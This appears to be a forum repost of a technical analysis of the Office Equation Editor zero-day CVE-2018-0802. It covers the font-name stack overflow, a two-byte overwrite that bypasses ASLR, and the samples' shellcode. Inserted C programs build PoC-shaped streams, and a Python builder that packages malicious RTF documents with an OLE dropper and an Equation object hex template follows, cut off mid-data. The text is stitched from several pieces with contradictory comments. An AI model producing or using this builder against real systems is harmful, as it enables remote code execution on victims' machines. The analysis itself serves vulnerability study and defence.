dEEpEst
Introduction
Microsoft's January 2018 security update fixes an Office 0day vulnerability (CVE-2018-0802) captured by the 360 Core Security Advanced Threat Response Team. The vulnerability affects almost all Office versions that Microsoft currently supports. This is the second outbreak of high-level threats using a zero-day since 360's first global interception of an Office 0day (CVE-2017-11826). The 360 core security team communicated actively with Microsoft and worked with them to get the 0day fixed, so that the vulnerability could be properly resolved before its details were disclosed. Technically the vulnerability is closely related to the 2017 "Dream Formula" vulnerability (CVE-2017-11882): it is a renewed attack on EQNEDT32.EXE, the Equation Editor component embedded in Office, so we call it "Dream Formula II" (CVE-2018-0802).
Attack process analysis
We captured several in-the-wild attacks using "Dream Formula II". The samples embed two formula (Equation) objects, one using the Nday vulnerability and one using the 0day. The Nday object attacks unpatched systems, while the 0day object attacks fully patched systems by bypassing the ASLR (address space layout randomization) that the CVE-2017-11882 patch enabled; either way the attack ends by implanting a malicious remote-control program on the victim's computer.
Figure: "Dream Formula II" in-the-wild sample attack process
Vulnerability analysis
"Dream Formula II" is a patch-bypass vulnerability for CVE-2017-11882; its type is a stack overflow. The root cause is that Microsoft's patch for "Dream Formula" (CVE-2017-11882) did not fix the unbounded copy of the font FaceName. On an unpatched version this vulnerability only causes a crash, but on a patched version it can be exploited perfectly. Below we analyze CVE-2018-0802 using PoC samples.
Static analysis
As with CVE-2017-11882, the data that triggers this vulnerability lies in the "Equation Native" stream of the extracted OLE object. The red-boxed portion of Figure 1 is the core data, 0x99 = 153 bytes in total. 0x08 is the font tag; the following 00 01 are the typeface and style of the font; and the region from 33 up to 25 00 is the font name, which is the data copied during the stack overflow. This region contains the shellcode, the ASLR-bypass trick, the process command line and padding; we analyze them later.
Figure 1
Equation Native data structure
According to information published online, the overall "Equation Native" data structure is:
EquationNative Stream Data = EQNOLEFILEHDR + MTEFData
MTEFData = MTEF header + MTEF byte stream.
The structure of EQNOLEFILEHDR is shown in Figure 2:
Figure 2
The structure of the MTEF header is shown in Table 1. For this structure there are differences between the actual data and the published format specification; the table shows what we actually observed:

Offset  Description                         Value
0       MTEF version number                 0x03
1       Platform that generated the data    0x00 = Macintosh, 0x01 = Windows
2       Product that generated the data     0x00 = MathType, 0x01 = Equation Editor
3       Product major version number        0x03
4       Product minor version number        0x0A
Table 1
In the attack sample, the MTEF byte stream has the structure shown in Table 2:
Initial SIZE record
FONT records
FONT content
Remaining data
Table 2
The FONT record and FONT content structure are shown in Table 3:

Member  Description        Note
Tag     0x08               1 byte
Tface   Typeface number    1 byte
Style   Font style         1 byte
Name    Font name          NUL-terminated ASCII string
Table 3
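As an added example (not code from the 360 write-up or from the samples), the following C program parses the Equation Native layout of Figure 2 and Tables 1 to 3, extracts the FONT record and checks its name against the 32-byte lfFaceName limit that the rest of the analysis turns on. The stream bytes it builds are constructed for illustration. The EQNOLEFILEHDR field offsets (cbHdr, version, cf, cbObject, reserved), the assumption that the leading size record and a LINE record carry no payload, and the constructed clipboard-format value are assumptions not stated in the tables above.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define LF_FACESIZE    32     /* length of LOGFONT.lfFaceName incl. NUL (Figure 5) */
#define EQN_HDR_SIZE   0x1C   /* sizeof(EQNOLEFILEHDR), Figure 2 */
#define MTEF_HDR_SIZE  5      /* MTEF header, Table 1 */
#define MTEF_FONT_TAG  0x08   /* FONT record tag, Table 3 */

struct font_record {
    uint8_t tface;        /* typeface number */
    uint8_t style;        /* font style */
    size_t  name_off;     /* offset of the name inside the stream */
    size_t  name_len;     /* bytes before the NUL terminator */
};

/* Walks an Equation Native stream and returns the first FONT record in *out.
 * Returns 1 on success, 0 if the layout does not match the page's description.
 * Assumption: the records preceding FONT in the sample layout (a size record,
 * 0x0A..0x0E, and a LINE record 0x01 with no option bits) have no payload. */
static int eqn_find_font(const uint8_t *s, size_t n, struct font_record *out)
{
    if (n < EQN_HDR_SIZE + MTEF_HDR_SIZE) return 0;
    uint16_t cb_hdr = (uint16_t)(s[0] | (s[1] << 8));      /* EQNOLEFILEHDR.cbHdr */
    if (cb_hdr != EQN_HDR_SIZE) return 0;
    if (s[EQN_HDR_SIZE] != 0x03) return 0;                 /* MTEF version 3 */

    for (size_t i = EQN_HDR_SIZE + MTEF_HDR_SIZE; i < n; ) {
        uint8_t tag = s[i];
        if (tag == MTEF_FONT_TAG) {
            if (i + 3 >= n) return 0;
            out->tface    = s[i + 1];
            out->style    = s[i + 2];
            out->name_off = i + 3;
            const uint8_t *nul = memchr(s + out->name_off, 0, n - out->name_off);
            if (nul == NULL) return 0;                     /* unterminated name */
            out->name_len = (size_t)(nul - (s + out->name_off));
            return 1;
        }
        if ((tag >= 0x0A && tag <= 0x0E) || tag == 0x01) { i++; continue; }
        return 0;                                          /* record we do not model */
    }
    return 0;
}

/* The unbounded copy in sub_21E39 never checks this: a name longer than
 * LF_FACESIZE-1 cannot fit lfFaceName together with its terminator. */
static int eqn_font_name_overflows(const struct font_record *f)
{
    return f->name_len > LF_FACESIZE - 1;
}

/* Builds a constructed Equation Native stream carrying the given font name.
 * Returns the stream length, or 0 if buf is too small. */
static size_t eqn_build(uint8_t *buf, size_t cap, const uint8_t *name, size_t name_len)
{
    static const uint8_t mtef_hdr[MTEF_HDR_SIZE] = { 0x03, 0x01, 0x01, 0x03, 0x0A }; /* Table 1 */
    static const uint8_t lead[] = { 0x0A, 0x01 };   /* size record, then LINE (assumed no options) */
    size_t mtef_len = MTEF_HDR_SIZE + sizeof lead + 3 + name_len + 1;
    if (cap < EQN_HDR_SIZE + mtef_len || mtef_len > 0xFFFF) return 0;

    memset(buf, 0, EQN_HDR_SIZE);
    buf[0] = EQN_HDR_SIZE;                              /* cbHdr */
    buf[4] = 0x02;                                      /* version 0x00020000 */
    /* cf (clipboard format) at offsets 6..7 is left 0 here: constructed value */
    buf[8] = (uint8_t)mtef_len; buf[9] = (uint8_t)(mtef_len >> 8); /* cbObject */

    size_t i = EQN_HDR_SIZE;
    memcpy(buf + i, mtef_hdr, MTEF_HDR_SIZE); i += MTEF_HDR_SIZE;
    memcpy(buf + i, lead, sizeof lead);       i += sizeof lead;
    buf[i++] = MTEF_FONT_TAG; buf[i++] = 0x00; buf[i++] = 0x01; /* tag, tface, style */
    memcpy(buf + i, name, name_len);          i += name_len;
    buf[i++] = 0x00;                                    /* terminator, also copied by the overflow */
    return i;
}

/* Constructed name shaped like the PoC's: 0x94 filler bytes reach the return
 * address, then 0x25 and the NUL overwrite its low word (core data = 0x99 bytes). */
static size_t eqn_build_poc_like(uint8_t *buf, size_t cap)
{
    uint8_t name[0x94 + 1];
    memset(name, 'A', 0x94);
    name[0x94] = 0x25;
    return eqn_build(buf, cap, name, sizeof name);
}

int main(void)
{
    uint8_t buf[512];
    struct font_record f;
    size_t n = eqn_build_poc_like(buf, sizeof buf);
    if (eqn_find_font(buf, n, &f))
        printf("FONT: tface=%u style=%u name_len=0x%zx overflow=%d core=0x%zx\n",
               (unsigned)f.tface, (unsigned)f.style, f.name_len,
               eqn_font_name_overflows(&f), 3 + f.name_len + 1);
    n = eqn_build(buf, sizeof buf, (const uint8_t *)"Times New Roman", 15);
    if (eqn_find_font(buf, n, &f))
        printf("FONT: name_len=%zu overflow=%d\n", f.name_len, eqn_font_name_overflows(&f));
    return 0;
}
```

The same walk can be run over the "Equation Native" stream of any OLE object pulled out of a document: a FONT name longer than 31 bytes is the condition the unpatched copy never checks, and a name of 0x95 bytes reproduces the 0x99-byte core data described above.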
Patch bypass analysis
The trigger point of CVE-2018-0802 is in sub_21E39 (with the module base set to 0 in IDA), shown in Figure 3. The function's job is to initialize a LOGFONT structure from the font data in the formula:
Figure 3
Let us look at Microsoft's description of the LOGFONT structure (Figure 4). The last member of this structure is lfFaceName.
Figure 4: LOGFONT Structure
Now Microsoft's description of the lfFaceName member (Figure 5): lfFaceName is the typeface name of the font. On the version being analyzed it is a NUL-terminated char string of at most 32 characters, including the terminating NUL.
Figure 5
The problem is obvious: the code in the red box in Figure 3 does not limit the copy length when copying the font FaceName. The source of the copy is the user-supplied font name, and the destination is the address of a LOGFONT structure passed in by the parent function. Looking at the parent of sub_21E39 (Figure 6), this address is a local variable on the stack frame opened by the parent function. The attacker constructs malicious data, overwrites the last two bytes of the parent function's (sub_21774's) return address, and thereby redirects control flow to shellcode on the stack.
Figure 6
During the analysis we found what looked like recursion. Figure 7 shows the disassembly of sub_21774. sub_21774 first calls the vulnerable function sub_21E39 to initialize a LOGFONT structure, then calls the relevant API with that structure so that the system returns a font name, which is saved in Name. It then compares the obtained Name with the user-supplied lpLogFont. If they differ (and the sub_115A7 function returns False), it decides whether or not to call itself according to the condition a3, where a3 is the third parameter of sub_21774.
Figure 7
Let us look at that third parameter, because if the recursion could go several levels deep the overflow could not be exploited effectively. From the earlier CVE-2017-11882 debugging (Figure 8), when the user-supplied font data is parsed, the function that calls sub_21774 is sub_214C6. Looking back at sub_214C6 (Figure 9), it calls sub_21774 with 1 as the third parameter, so if(a3) in Figure 7 is true. Looking at Figure 7 again, when sub_21774 calls itself recursively it passes 0 as the third parameter, which means sub_21774 does not call itself again: the recursion is only one level deep. That resolves the question about recursion.
Figure 8: CVE-2017-11882 Triggered Execution Flow
Figure 9
One more point from the analysis: if _strcmpi(lpLogFont, &Name) is non-zero (i.e. the names differ, which is certainly the case when the font data is forged by the user), sub_115A7 is called, which leads to the CVE-2017-11882 overflow point. On versions without the November patch, successfully exploiting CVE-2017-11882 means the CVE-2018-0802 point never overflows, because the former needs a much smaller overflow than the latter and the copy ends with a NUL truncation (controlling EIP via CVE-2017-11882 requires only 0x2C bytes, while, as the analysis below and Figure 11 show, controlling EIP via CVE-2018-0802 requires 0x94 bytes). Conversely, if you try to trigger CVE-2018-0802 on a version without the November patch, the CVE-2017-11882 overflow in sub_115A7 fires first. In short, CVE-2018-0802 is not exploitable before the November patch.
However, as Figure 10 shows, in the November patch Microsoft limited the copy at the CVE-2017-11882 overflow point to 0x20 bytes and manually appended a NUL after the copy, which neutralizes CVE-2017-11882. That is exactly what turns CVE-2018-0802, unexploitable before the patch, into an exploitable bug! Now, as long as sub_115A7 returns False, the overflow can be exploited perfectly, and actual debugging shows that sub_115A7 does return False.
Figure 10
Dynamic Analysis
Overflow data copy
With the static analysis done, dynamic analysis is very simple. Since the overflow point copies data, we monitor the source string and the corresponding stack backtrace for each copy: first break in the Load function that handles the OLE data (sub_6881), then break before the copy and print. The result is shown in the log:
The log shows two copies, and the stack backtraces show that they correspond to the two calls to sub_21774 from the static analysis: the first is the call from sub_214C6 to sub_21774, and the second is sub_21774 calling itself. The stack overflow obviously happens in the first copy. As an aside, the bytes cb ce cc e5 are the GBK encoding of 宋体 (SimSun).
Let us calculate exactly how many bytes must overflow to control the return address of the parent function (sub_21774); the conclusion was already mentioned in the "Patch bypass analysis" section. From Figure 11, overflowing from lfFaceName (ebp-0x90) to ret_addr (ebp+0x4) requires 0x94 bytes in total. Whatever exceeds 0x94 bytes overwrites the return address byte by byte, starting from its low address.
Figure 11
Now look at the data in the PoC. In Figure 12 the blue part is the first 0x94 bytes of the overflow, and 25 00 are the last two bytes written: 00 is the terminator, and the copy stops when it reaches it. Because of the little-endian layout, when the PoC runs only the lower 2 bytes of the return address are overwritten. Why do it this way? To bypass ASLR.
Figure 12
Bypass ASLR
Let us see why overwriting only two bytes is enough to bypass ASLR.
First, it must be clear that the patched file has ASLR enabled, as shown in Figure 13. Consequently EQNEDT32.EXE is loaded at a random base address every time, so the first problem to solve when overflowing is how to bypass ASLR. (As for DEP, Figure 14 shows that DEP is not enabled for EQNEDT32.EXE in the patched file, so DEP normally does not need to be considered.)
Unfortunately, the attackers clearly understand the Windows mechanisms and defenses. On Windows, ASLR for a 32-bit process only randomizes the upper 2 bytes of an image address each time; the lower 2 bytes stay the same. So if a ret instruction can be found within the same 64 KB region as the overwritten address, at an address of the form 0xABCD00XY (ABCD and XY being arbitrary hex digits; the second-lowest byte must be 0x00 because the copy is terminated precisely by the NUL), that ret can be used directly to jump onto the stack. Since DEP does not need to be bypassed, the shellcode can execute directly on the stack.
Figure 13: ASLR Status of EQNEDT32.EXE is Enabled and DEP is Non-Permanent DEP
Figure 14: DEP Status of EQNEDT32.EXE is Disabled
Even more unfortunately, within the EQNEDT32.EXE module Microsoft provided exactly one such address (Figure 15): only offset 20025 satisfies the condition, i.e. the two bytes written over EIP are 25 00. It is unique; there is no second ret that satisfies the condition.
Figure 15
Now consider what the original return address of sub_21774 is. Naturally it is the address of the instruction following the call to sub_21774 in sub_214C6. Figure 16 shows that this address is at offset 214E2. After the overwrite shown in Figure 12 the offset becomes 20025, which, per the analysis above and Figure 17, is a ret instruction. This ret pops the first argument that sub_214C6 passed to sub_21774 and transfers control to that value. To make matters worse, this first argument happens to be lpLogFont, the user-supplied FontName. So after the ret executes, control is transferred to the stack and execution starts at the first byte of the user-supplied FontName.
Figure 16
Figure 17
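To make the mechanics of the last three sections concrete, here is an added C model (not the 360 team's code and not EQNEDT32.EXE's) of the sub_21774 stack frame as Figure 11 describes it: lfFaceName at ebp-0x90 and the saved return address at ebp+4, 0x94 bytes apart. It shows the unbounded copy overwriting only the low 16 bits of the return address, why the result (base+0x20025 for any base) survives ASLR, how a bounded copy prevents it, and a search for ret bytes the overwrite can reach. The offsets 0x214E2 and 0x20025 are the page's; the LOGFONT layout is the standard 32-bit one; the filler size, the image bases, the saved-ebp value and the stand-in image bytes are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define LF_FACESIZE 32

/* 32-bit LOGFONT as in Figure 4: seven LONGs, eight BYTEs, then the name. */
typedef struct {
    int32_t lfHeight, lfWidth, lfEscapement, lfOrientation, lfWeight;
    uint8_t lfItalic, lfUnderline, lfStrikeOut, lfCharSet,
            lfOutPrecision, lfClipPrecision, lfQuality, lfPitchAndFamily;
    char    lfFaceName[LF_FACESIZE];
} LOGFONT32;

/* Model of sub_21774's frame (Figure 11): the LOGFONT local, further locals,
 * the saved frame pointer and the return address. The filler size is chosen
 * (constructed) so that lfFaceName and ret_addr are 0x94 bytes apart. */
struct frame {
    LOGFONT32 lf;
    uint8_t   other_locals[0x70];
    uint32_t  saved_ebp;
    uint32_t  ret_addr;
};

#define RET_RVA       0x214E2u   /* return address into sub_214C6 (Figure 16) */
#define RET_GADGET    0x20025u   /* the only reachable ret (Figure 15) */
#define OFF_FACENAME  offsetof(struct frame, lf.lfFaceName)
#define OFF_RET       offsetof(struct frame, ret_addr)

/* Vulnerable pattern (sub_21E39): copy until NUL with no length check. Written
 * through a byte pointer over the whole frame so the overrun stays inside this
 * object and the demo remains well-defined C. */
static void copy_facename_unbounded(struct frame *f, const char *name)
{
    uint8_t *dst = (uint8_t *)f + OFF_FACENAME;
    size_t i = 0;
    do { dst[i] = (uint8_t)name[i]; } while (name[i++] != '\0');
}

/* Bounded variant: at most LF_FACESIZE-1 bytes and always NUL-terminated
 * (the same idea as the 0x20 limit plus NUL of the November patch). */
static void copy_facename_bounded(struct frame *f, const char *name)
{
    size_t n = 0;
    while (n < LF_FACESIZE - 1 && name[n] != '\0') n++;
    memcpy(f->lf.lfFaceName, name, n);
    f->lf.lfFaceName[n] = '\0';
}

/* Runs one copy against a frame whose return address points into sub_214C6
 * at the given (constructed, 64 KiB-aligned) image base; returns ret_addr. */
static uint32_t run_copy(uint32_t image_base, int bounded)
{
    struct frame f;
    char name[0x94 + 2];
    memset(&f, 0, sizeof f);
    f.saved_ebp = 0x0018FF00u;           /* constructed */
    f.ret_addr  = image_base + RET_RVA;
    memset(name, 'A', 0x94);             /* 0x94 bytes reach the return address */
    name[0x94] = 0x25;                   /* overwrites its low byte ... */
    name[0x95] = '\0';                   /* ... and the copied NUL the next one */
    if (bounded) copy_facename_bounded(&f, name);
    else         copy_facename_unbounded(&f, name);
    return f.ret_addr;
}

/* Addresses reachable by the two-byte overwrite: same 64 KiB block as the
 * original return address, second-lowest byte 0x00. Counts ret (0xC3) bytes
 * there and reports the first one. */
static int find_ret_gadgets(const uint8_t *img, size_t len, uint32_t ret_rva, uint32_t *first)
{
    int count = 0;
    uint32_t block = ret_rva & 0xFFFF0000u;
    for (uint32_t rva = block; rva < block + 0x100 && rva < len; rva++)
        if (img[rva] == 0xC3 && count++ == 0) *first = rva;
    return count;
}

/* Constructed stand-in for EQNEDT32.EXE's image: one ret at 0x20025 and two
 * decoys that the overwrite cannot reach. */
static const uint8_t *constructed_image(size_t *len)
{
    static uint8_t img[0x30000];
    memset(img, 0x90, sizeof img);
    img[RET_GADGET] = 0xC3;
    img[0x214E1]    = 0xC3;    /* second-lowest byte is 0x14, not 0x00 */
    img[0x10030]    = 0xC3;    /* different 64 KiB block */
    *len = sizeof img;
    return img;
}

int main(void)
{
    size_t len; uint32_t first = 0;
    const uint8_t *img = constructed_image(&len);
    printf("lfFaceName -> ret_addr: 0x%zx bytes\n", (size_t)(OFF_RET - OFF_FACENAME));
    printf("base 0x00400000: unbounded -> 0x%08x, bounded -> 0x%08x\n",
           run_copy(0x00400000u, 0), run_copy(0x00400000u, 1));
    printf("base 0x00610000: unbounded -> 0x%08x\n", run_copy(0x00610000u, 0));
    printf("reachable ret gadgets: %d (first at 0x%x)\n",
           find_ret_gadgets(img, len, RET_RVA, &first), first);
    return 0;
}
```

Whatever 64 KiB-aligned base the loader picks, the unbounded copy turns base+0x214E2 into base+0x20025, which is why the PoC never needs to know the base; the bounded copy leaves the return address untouched, and the gadget search shows that only a ret whose address has the form 0x..00XY inside the same 64 KiB block is reachable at all.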
Sample A Shellcode Analysis
In the PoC derived from sample A, the control-flow hijack and the execution of the shellcode are shown in Figure 18:
Figure 18: Because of the recursion, we return twice from sub_21774, which explains the first two rets
Immediately after the jmp eax instruction, WinExec is called, and the command-line parameter is calc.exe, as shown in Figure 19:
Figure 19
Sample B Shellcode Analysis
Sample B bypasses ASLR the same way as Sample A, but its shellcode differs. Sample B's shellcode locates the export table of kernel32.dll through the PEB (Figures 20 and 21), then searches the export table for the desired functions using a specific hash algorithm (Figure 21); the hash values are stored in the shellcode. The shellcode then saves each resolved function address over the location where its hash was stored (Figure 22).
Figure 20: Hash value and copy path name given in sample B's shellcode
Figure 21: Finding the required function in the export table of kernel32.dll with the hash value
Figure 22: Comparison of data on the stack before and after finding the function address
After finding the functions and saving their addresses on the stack, the shellcode first calls ExpandEnvironmentStringsA to expand a short path stored in the shellcode, then calls CopyFileA to copy the payload into the Word add-in directory so that the payload is loaded into memory the next time Word starts. Finally it calls ExitProcess to exit the Equation Editor process (Figure 23). None of this interferes with the normal opening of the document.
Figure 23: Expand the short path, copy the file, and exit the process
Summary
The 0day CVE-2018-0802 can be called the twin of CVE-2017-11882. In the attack sample one OLE object targets unpatched systems and the other targets patched systems; both are used in the same attack, so the carefully built document works whatever the patch state of the victim. Exploitability of this bug, and the ASLR bypass in particular, rests on a degree of coincidence: if there were no usable ret instruction in the EQNEDT32.EXE module, if lpLogFont were not the first parameter of sub_21774, or if the CVE-2017-11882 patch had enforced DEP, "Dream Formula II" would have had no opportunity.
The latest 360 security products already detect and block this zero-day, and we recommend that users install Microsoft's January 2018 security update.
Code .py
Code:
import argparse
import os
import struct


def _hex(b):
    """Hex-encode bytes (Python 3 replacement for the old str.encode('hex'))."""
    return b.hex()


class Package(object):
    """
    Packager spec based on:
    https://phishme.com/rtf-malware-delivery/
    Dropping method by Haifei Li:
    https://securingtomorrow.mcafee.com/mcafee-labs/dropping-files-temp-folder-raises-security-concerns/
    Found being used itw by @MalwareParty:
    https://twitter.com/MalwareParty/status/943861021260861440
    """

    def __init__(self, filename):
        self.filename = os.path.basename(filename)
        self.fakepath = 'C:\\fakepath\\{}'.format(self.filename)
        self.orgpath = self.fakepath
        self.datapath = self.fakepath
        with open(filename, 'rb') as f:
            self.data = f.read()
        # RTF wrapper for an embedded OLE "Package" object; objdata is hex-encoded
        self.OBJ_HEAD = r"{\object\objemb\objw1\objh1{\*\objclass Package}{\*\objdata "
        self.OBJ_TAIL = r"0105000000000000}}"

    def get_object_header(self):
        # OLE 1.0 object header preceding the package stream
        OLEVersion = '01050000'
        FormatID = '02000000'
        ClassName = 'Package'
        szClassName = _hex(struct.pack("<I", len(ClassName) + 1))
        szPackageData = _hex(struct.pack("<I", len(self.get_package_data()) // 2))
        return ''.join([
            OLEVersion,
            FormatID,
            szClassName,
            _hex(ClassName.encode()) + '00',
            '00000000',
            '00000000',
            szPackageData,
        ])

    def get_package_data(self):
        # Package stream: label, original path, data path, file contents,
        # then the same strings again as UTF-16LE
        StreamHeader = '0200'
        Label = _hex(self.filename.encode()) + '00'
        OrgPath = _hex(self.orgpath.encode()) + '00'
        UType = '00000300'
        DataPath = _hex(self.datapath.encode()) + '00'
        DataPathLen = _hex(struct.pack("<I", len(self.datapath) + 1))
        DataLen = _hex(struct.pack("<I", len(self.data)))
        Data = _hex(self.data)
        OrgPathWLen = _hex(struct.pack("<I", len(self.datapath)))
        OrgPathW = _hex(self.datapath.encode('utf-16le'))
        LabelLen = _hex(struct.pack("<I", len(self.filename)))
        LabelW = _hex(self.filename.encode('utf-16le'))
        DefPathWLen = _hex(struct.pack("<I", len(self.orgpath)))
        DefPathW = _hex(self.orgpath.encode('utf-16le'))
        return ''.join([
            StreamHeader,
            Label,
            OrgPath,
            UType,
            DataPathLen,
            DataPath,
            DataLen,
            Data,
            OrgPathWLen,
            OrgPathW,
            LabelLen,
            LabelW,
            DefPathWLen,
            DefPathW,
        ])

    def build_package(self):
        return self.OBJ_HEAD + self.get_object_header() + self.get_package_data() + self.OBJ_TAIL


RTF_HEADER = r"""{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
{\*\generator Riched20 6.3.9600}\viewkind4\uc1
\pard\sa200\sl276\slmult1\f0\fs22\lang9"""

# The remainder of the script (argument parsing, the Equation Native object and
# the RTF trailer) is not reproduced on this page.
RTF_TRAILER = R"""\par}
"""
OBJECT_HEADER = R"""{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata """
OBJECT_TRAILER = R"""
}{\result{\pict{\*\picprop}\wmetafile8\picw380\pich260\picwgoal380\pichgoal260
0100090000039e00000002001c0000000000050000000902000000000500000002010100000005
0000000102ffffff00050000002e0118000000050000000b0200000000050000000c02a0016002
1200000026060f001a00ffffffff000010000000c0ffffffc6ffffff20020000660100000b0000
0026060f000c004d61746854797065000020001c000000fb0280fe000000000000900100000000
0402001054696d6573204e657720526f6d616e00feffffff5f2d0a6500000a0000000000040000
002d01000009000000320a6001100003000000313131000a00000026060f000a00ffffffff0100
000000001c000000fb021000070000000000bc02000000000102022253797374656d000048008a
0100000a000600000048008a01ffffffff6ce21800040000002d01010004000000f00100000300
00000000
}}}
"""
OBJDATA_TEMPLATE_0802 = R"""
01050000020000000B0000004571756174696F6E2E33000000000000000000000E0000D0CF11E0A1
B11AE1000000000000000000000000000000003E000300FEFF090006000000000000000000000001
0000000100000000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFDFFFFFF04000000FEFFFFFF05
000000FEFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF52006F006F007400200045006E0074007200790000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000016000500FFFFFFFFFFFFFFFF0200000002CE020000000000C0000000000000460000000000
00000000000000B024837CC473D30103000000C00300000000000001004F006C0065000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000A000201FFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000
0000000000000000000000000000000000000000000000000000001400000000000000010043006F
006D0070004F0062006A000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000120002010100000004000000FFFFFFFF0000000000
00000000000000000000000000000000000000000000000000000000000000010000006600000000
00000003004F0062006A0049006E0066006F00000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000012000201FFFFFFFFFFFFFFFFFF
FFFFFF00000000000000000000000000000000000000000000000000000000000000000000000003
0000000600000000000000FEFFFFFF02000000FEFFFFFFFEFFFFFF05000000060000000700000008
00000009000000FEFFFFFFFEFFFFFF0C0000000D0000000E000000FEFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
FFFFFF01000002000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000100FEFF030A0000FFFFFFFF02
